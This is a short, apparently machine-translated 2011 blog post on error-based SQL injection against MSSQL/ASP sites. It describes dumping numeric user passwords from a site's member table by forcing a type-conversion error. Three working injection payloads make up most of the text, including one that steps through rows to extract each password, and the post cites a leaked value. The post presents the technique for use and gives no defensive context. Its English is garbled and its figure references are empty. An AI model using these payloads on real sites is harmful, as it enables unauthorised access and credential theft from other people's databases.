A reflection on the title:mssql of digital data with false injection--2011-02-22 15:23
Mssql+asp
Recently in a site, the password is a pure number, convert (int, ()) converted out of the error, do not know what other people use the function or type to explode the password like "11111111" of such data, I think of a temporary can use the method.
Database query:
Figure One:
Figure II:
Might
Figure IV:
Figure V:
Here's the experiment.
Table member field password
Statement
' or 1=convert (int, (select top 1 password from Member))--
Statement ' or 1=convert (int, (select top 1 password from member) + ' a ')--
And then query the next piece of data
Statement ' or 1=convert (int, (select top 1 password from member where password isn't in (' 117517450 ')) + ' a ')--
Do not know how other people explode, can tell me, leave a message, thank you.
A reflection on the digital data of MSSQL injection burst with error